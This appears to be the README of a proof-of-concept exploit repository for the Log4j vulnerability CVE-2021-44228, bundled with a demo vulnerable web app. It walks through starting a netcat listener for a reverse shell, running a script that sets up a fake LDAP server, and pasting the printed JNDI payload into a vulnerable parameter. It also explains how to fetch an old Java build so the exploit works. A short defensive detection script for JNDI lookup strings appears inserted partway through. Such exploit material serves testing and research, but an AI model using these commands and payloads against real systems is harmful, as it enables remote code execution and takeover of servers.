A Proof-Of-Concept for the recently found CVE-2021-44228 vulnerability.
Recently a new vulnerability was found in Log4j, a Java logging library that is very widely used in the likes of Elasticsearch, Minecraft and numerous others.
In this repository we have made an example vulnerable application and a proof-of-concept (PoC) exploit for it.
Vuln Web App: webapp.mp4
Ghidra (Old script): ghidra.mp4
Minecraft PoC (Old script): mclol.mp4
As a PoC we have created a Python file that automates the process.
pip install -r requirements.txt
- Start a netcat listener to accept the reverse shell connection.
nc -lvnp 9001
- Launch the exploit.
Note: For this to work, the extracted Java archive has to be named jdk1.8.0_20 and be in the same directory.
$ python3 poc.py --userip localhost --webport 8000 --lport 9001
[!] CVE: CVE-2021-44228
[!] Github repo: https://github.com/kozmer/log4j-shell-poc
[+] Exploit java class created success
[+] Setting up fake LDAP server
[+] Send me: ${jndi:ldap://localhost:1389/a}
Listening on 0.0.0.0:1389
This script will set up the HTTP server and the LDAP server for you, and it will also create the payload that you can paste into the vulnerable parameter. After this, if everything went well, you should get a shell on the lport.
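For checking detection against this PoC in a lab, the following Python sketch (an added example, not part of this repository) scans log lines for the lookup string the script prints, `${jndi:ldap://localhost:1389/a}`, including its percent-encoded form, and extracts the callback host and port. The function names, log formats and sample lines are constructed for illustration, and only the literal form shown above is matched.

```python
import re
from urllib.parse import unquote, urlsplit

# Literal lookup form printed by the PoC, e.g. ${jndi:ldap://localhost:1389/a}.
JNDI_LOOKUP = re.compile(r"\$\{jndi:([^}\s]+)\}", re.IGNORECASE)

# Constructed sample lines (hypothetical log formats, documentation-range IP).
SAMPLE_LOG = [
    "2021-12-10 12:00:01 INFO login attempt username=alice",
    "2021-12-10 12:00:05 INFO login attempt username=${jndi:ldap://localhost:1389/a}",
    '203.0.113.9 - - [10/Dec/2021:12:00:09 +0000] "GET /login?username='
    '%24%7Bjndi%3Aldap%3A%2F%2Flocalhost%3A1389%2Fa%7D HTTP/1.1" 200 87',
]


def parse_target(uri):
    """Split the lookup URI into (scheme, host, port); None for unparsable parts."""
    try:
        parts = urlsplit(uri)
        scheme, host = parts.scheme.lower(), parts.hostname
    except ValueError:  # e.g. malformed IPv6 brackets
        return None, None, None
    try:
        port = parts.port
    except ValueError:  # non-numeric or out-of-range port
        port = None
    return scheme, host, port


def find_jndi_lookups(lines):
    """Return one finding per JNDI lookup string seen in the given log lines."""
    findings = []
    for lineno, raw in enumerate(lines, start=1):
        # Access logs keep the request percent-encoded, so decode before matching;
        # unquote() leaves lines without escapes unchanged.
        for match in JNDI_LOOKUP.finditer(unquote(raw)):
            scheme, host, port = parse_target(match.group(1))
            findings.append({"line": lineno, "scheme": scheme, "host": host,
                             "port": port, "lookup": match.group(0)})
    return findings


if __name__ == "__main__":
    for finding in find_jndi_lookups(SAMPLE_LOG):
        print(finding)
```

Each finding carries the callback host and port, which can then be searched for in egress firewall or DNS logs.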
At the time of creating the exploit we were unsure of exactly which versions of Java work and which don't, so we chose to work with one of the earliest versions of Java 8: java-8u20.
Oracle thankfully provides an archive for all previous Java versions:
https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html
Scroll down to 8u20 and download the appropriate files for your operating system and hardware.
Note: You do need to make an account to be able to download the package.
Once you have downloaded and extracted the archive, you can find java and a few related binaries in jdk1.8.0_20/bin.
Note: Please make sure to extract the jdk folder into this repository with the same name in order for it to work.
❯ tar -xf jdk-8u20-linux-x64.tar.gz
❯ ./jdk1.8.0_20/bin/java -version
java version "1.8.0_20"
Java(TM) SE Runtime Environment (build 1.8.0_20-b26)
Java HotSpot(TM) 64-Bit Server VM (build 25.20-b23, mixed mode)